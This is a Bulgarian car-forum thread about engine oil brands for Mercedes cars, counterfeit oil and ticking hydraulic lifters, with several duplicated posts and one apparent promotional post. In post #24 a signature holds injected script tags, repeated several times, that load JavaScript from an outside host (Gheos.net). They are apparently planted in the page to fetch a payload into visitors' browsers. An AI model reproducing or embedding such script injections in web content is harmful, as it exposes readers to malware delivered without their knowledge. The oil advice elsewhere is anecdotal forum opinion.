да се похвалясмених маслото и стана АД
Започната от Lorinser, 16 апр 2007 - 17:13:22
69 мнения по тази тема
#16
Публикувано 19 април 2007 - 22:25
не съм много компетентен но мисля, че МБ не трябва да се кара с минерално масло.хидравличните повдигачи тракат точно по тази причина
#17
Публикувано 19 април 2007 - 23:18
Глас в подкрапа ма ПРИСТА- докоснах се и до пълната им синтетика (5W-40)- 5л за 51лв- сипах го на бегачката- никакви забележки.
В форумите за фиат и ланча хвалят доста Селенията и Тутелата.
Бояне, що верно не опиташ една проба със Приста 10в-40 или Селения Голд или Тутела Жарама
Selenia gold - Отговаря на спецификация МВ 229.1
Тутелата е на същата спецификация.
SELENIA K - Отговаря на спецификация MB 229.3
SELENIA SPORT SAE 10W-60
В форумите за фиат и ланча хвалят доста Селенията и Тутелата.
Бояне, що верно не опиташ една проба със Приста 10в-40 или Селения Голд или Тутела Жарама
Selenia gold - Отговаря на спецификация МВ 229.1
Тутелата е на същата спецификация.
SELENIA K - Отговаря на спецификация MB 229.3
SELENIA SPORT SAE 10W-60
Lancia Kappa TDS / Land-Rover 88 Series 3 FFR
#18
Публикувано 19 април 2007 - 23:55
три цикъла по 15000км направих със Селения голд със старата ми 190-ка и съм много доволен. За тези километри не съм доливал нито веднъж. Купувах го магазин на стамболийски в двулитрови туби по 10лв.за литър
#19
Публикувано 20 април 2007 - 10:50
аз пък карам с 0-60 масло на... изкочи ми от главата. Но го карат от Германия и моя майстор го взима от директния вносител. Нанй си менте. Освен че е скъпичко - около 25-30лв. литъра, затихнаха ми повдигачите и разхода се оправи. И аз щото много карам (10 000км/год) та въобще и не мисля да слагам разни бози.
#20
Публикувано 20 април 2007 - 13:12
Мойто масло в момента е SUNOKO FUTURA 10W40 някакво си
и четейки горните ви коментари ми се изправят косите.
Да поясня обаче - когато казах на дилъра си от покупката на колата, че съм сменил маслото и т. н., той остана нещо недоволен - заподозрях го и питам "да не сте наливали добавки за компресията , за инжекцията нещо...???"
Не бе , вика той - тука /в БГ/ свястно масло няма да намериш, не трябваше да го сменяш.
Да ама и аз като тълпата - аре нова кола и "бегом" маслото да сменям - и кой знае на какво съм се набил сега , но определено не е станал по-шумен мотора и няма тракане според мойте си преценки.
и четейки горните ви коментари ми се изправят косите.
Да поясня обаче - когато казах на дилъра си от покупката на колата, че съм сменил маслото и т. н., той остана нещо недоволен - заподозрях го и питам "да не сте наливали добавки за компресията , за инжекцията нещо...???"
Не бе , вика той - тука /в БГ/ свястно масло няма да намериш, не трябваше да го сменяш.
Да ама и аз като тълпата - аре нова кола и "бегом" маслото да сменям - и кой знае на какво съм се набил сега , но определено не е станал по-шумен мотора и няма тракане според мойте си преценки.
#21
Публикувано 20 април 2007 - 16:40
Колеги, осъзнайте се! Почвате да пишете пълни глупости, което е прекалено.
Това, че понякога се случва някой да попадне на менте (което понякога не е напълно доказано) не означава, в бг не се намират лесно качествени масла. Както и че мерцедесите не са с кой знае колко високотехнологични и свръхнатоварени двигатели. Има толкова много нови автомобили с далеч по-нови и сложни двигатели, които се обслужват в БГ и маслото което им се слага е наливно от варели, купени от официалния вносител на дадено масло и никой не се е повредил от масло менте. Освен това спецификациите и стандартите за маслата са еднакви за всички производители, така че марката не е от особено значение, стига производителя да е сертифициран по ISO. Който го е страх нека не си сменя маслото докато не стане на грес да видим тогава кой ще му е виновен. Да не говорим, че има и български масла, които даже превъзхождат вносни такива.
Друг е въпроса че направо Ви се чудя с какъв акъл давате повече от 10лв за литър МИНЕРАЛНО масло, било то и кастрол, даже ако ще и в
НАСА да са го произвеждали.
Няколко души от Клуба съм ги снабдявал със полусинтетика, дето като им казах цената мигаха на парцали, та нека кажат дали са доволни от маслото.
Освен това за качеството на едно масло не може да се съди само по-това дали на празен ход държи максимално по-високо налягане. Ако вместо масло сипете олио или вода, още на стартер ще имате 4 атмосфери, а колко ще смазва е друга работа.
Та без да правя реклами се надявам да ми подкрепите идеята да ползваме една марка масло, независимо коя е, но да се снабдяваме от производител/'директен представител, стига да успее да ни съблазни с цена.
Това, че понякога се случва някой да попадне на менте (което понякога не е напълно доказано) не означава, в бг не се намират лесно качествени масла. Както и че мерцедесите не са с кой знае колко високотехнологични и свръхнатоварени двигатели. Има толкова много нови автомобили с далеч по-нови и сложни двигатели, които се обслужват в БГ и маслото което им се слага е наливно от варели, купени от официалния вносител на дадено масло и никой не се е повредил от масло менте. Освен това спецификациите и стандартите за маслата са еднакви за всички производители, така че марката не е от особено значение, стига производителя да е сертифициран по ISO. Който го е страх нека не си сменя маслото докато не стане на грес да видим тогава кой ще му е виновен. Да не говорим, че има и български масла, които даже превъзхождат вносни такива.
Друг е въпроса че направо Ви се чудя с какъв акъл давате повече от 10лв за литър МИНЕРАЛНО масло, било то и кастрол, даже ако ще и в
НАСА да са го произвеждали.
Няколко души от Клуба съм ги снабдявал със полусинтетика, дето като им казах цената мигаха на парцали, та нека кажат дали са доволни от маслото.
Освен това за качеството на едно масло не може да се съди само по-това дали на празен ход държи максимално по-високо налягане. Ако вместо масло сипете олио или вода, още на стартер ще имате 4 атмосфери, а колко ще смазва е друга работа.
Та без да правя реклами се надявам да ми подкрепите идеята да ползваме една марка масло, независимо коя е, но да се снабдяваме от производител/'директен представител, стига да успее да ни съблазни с цена.
Lancia Kappa TDS / Land-Rover 88 Series 3 FFR
#22
Публикувано 21 април 2007 - 00:38
не знам защо никой не говори за Бритиш Петролеум? не се ли продава в БГ или? тък навсякъде и в официалните сервизи на МБ и в кой да е друг магазин като питаш за масло за МБ ти дават Б.П.
W124 300D
#23
Публикувано 21 април 2007 - 11:19
За съжаление това е жалката истина у нас.Продават ти ментета под път и над път и правата ти са заврени там където слънце не огрява.Нямаш никакъв шанс бърво и безпроблемно да докажаеш,че са ти набутали фалшификат на Кастрол.Една от най фалшифицираните марки масла.Моя съвет е ако си пазиш касовия бон за покупка е, да източиш маслото да го запечаташ и да го пратиш в някое редставителство в Европа.Другия вариант е, да купим един литър от същото малло и да го пратим за експертиза.Следва дълга съдебна процедура но само това е начина,да постигнеш обещетение (морално и материално).Инак пиеш една студена вода псуваш тун във форума и те олеква.
rudiRo
Колеги, здравейте,
Днес погледнах във форума. Този случай ми напомни за моя, който ви разказвах, но тогава някой не повярваха, други приеха иронично.
Имам нова информация за SX6000. Попаднах на Изтрито заради Реклама!!!.
Oстанах приятно изненадан от видеото-екстремен тест и практически тест.
#24
Публикувано 21 април 2007 - 11:44
rudiRo, аз лично вече се леко дразня от вметките ти за този продукт . Всичките ти 9 поста са свързани с него . Имам чувство , че само чакаш подходяща тема за да ни напомниш за продукта на Кю Ем Ай , което ми мирише на рекламка . Самият аз не съм от най- активно пишещите в този форум , но от време на време питам по разни въпроси колегите и рядко , но все пак, споделям собствен опит . Надявам се активно да се включиш с коментари и по други теми , което считам , че ще е тест за твоята страст към любимата марка и безкористно поведение във форума.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#25
Публикувано 21 април 2007 - 18:39
Здравейте,на 190 карам с LIQUI MOLI 10w40 вече 3 години за 54лв 5 л сменям го на 10х км купувам го от Лук Оил,а на четериочката си купих масло от Балкан Стар защото има много ментета по нашия пазар и ги накарах те да ми го сменят ,ако има нещо рекламация на место(използвам да благодаря за съвета от Вас който получих).По старичките МБ са за масло 10w40, а по новичките са за 5w40,това съм се убедил от опит и никога не съм сменял повдигачи.И друго изкам да Ви споделя в годините в които съм бил по чужбина мнооого рядко съм виждал собственици на по старички автомобили да сменят масло,издърпват част от старото масло през щеката и сипват ново но само до 2литра(за дане се набутат много) или някоя добавчица и газ до дупка.Така че нека не Ви боли главата купуваш само от реномирани места сипваш ако му хареса на моторчето продължаваш,всеки мотор е индивидуален кото хората някой пие ракийка,друг коктейлче трети на биричка кой на каквото е свикнал.
#26
Публикувано 21 април 2007 - 18:53
При мен въпроса е решен кардинално.Не си сменявам сам маслото.Ходя само при един и същ "маслар", който сипва масло по негов избор- като много добре знае,че ако стане нещо вината е негова.
#27
Публикувано 21 април 2007 - 21:29
Айде сега и аз да кажа нещо , проблема не е в маслото
Може така да ти се иска обаче ако не вярваш ходи си сложи друго 15/40 и пак ще трака така
залагам 1 литър полусинтетика че кастрола не е менте а просто не се разбира с колата ти , аз също съм сипвал 15/40 кастрол и тракаше веднага го смених с 10/40 от същото место и спря д атрака веднагааааа
Може така да ти се иска обаче ако не вярваш ходи си сложи друго 15/40 и пак ще трака така
залагам 1 литър полусинтетика че кастрола не е менте а просто не се разбира с колата ти , аз също съм сипвал 15/40 кастрол и тракаше веднага го смених с 10/40 от същото место и спря д атрака веднагааааа
W202 C180
#28
Публикувано 21 април 2007 - 22:04
и аз подкрепям това твърдение.
Един познат се беше бръкнал за Кастрол РС 10в-60 по 28 кинта на едро и си го сипа в черокито- 2000г V8, 5 литра ли е колко е нз, абе голям американски двигател и ... ИИИ почнаха да му тракат хидравлични повдигачи- двигателя му е проектиран за 5В-20, но понеже в бг няма , спокоино му се слага 5В-30. И смени си маслото отново и му се оправиха нещата.
Един познат се беше бръкнал за Кастрол РС 10в-60 по 28 кинта на едро и си го сипа в черокито- 2000г V8, 5 литра ли е колко е нз, абе голям американски двигател и ... ИИИ почнаха да му тракат хидравлични повдигачи- двигателя му е проектиран за 5В-20, но понеже в бг няма , спокоино му се слага 5В-30. И смени си маслото отново и му се оправиха нещата.
Lancia Kappa TDS / Land-Rover 88 Series 3 FFR
#29
Публикувано 22 април 2007 - 14:06
A,има го масово...Същия вносител на Кастрола,те нали се обединиха...Поносими и конкурентни на другите марки цени,за разлика от Кастрола...не знам защо никой не говори за Бритиш Петролеум? не се ли продава в БГ или? тък навсякъде и в официалните сервизи на МБ и в кой да е друг магазин като питаш за масло за МБ ти дават Б.П.
Blood, Sweat and Diesel !
#30
Публикувано 23 април 2007 - 16:40
реших проблема----чичото идва от германия всяка седмица и ВЕЧЕ само от там ще си взимам масло. донесе ми Кастрол в чера туба---сипах го и колата заспа... просто с една смяна невероятна разлика. е естествено и повдигачите смених, то и преди се обаждаше един повдигач такаче...отдавна се дразнех. от БГ няма и една капка масло да си слагам вече
1 потребител(и) четат тази тема
0 потребители, 1 гости, 0 анонимни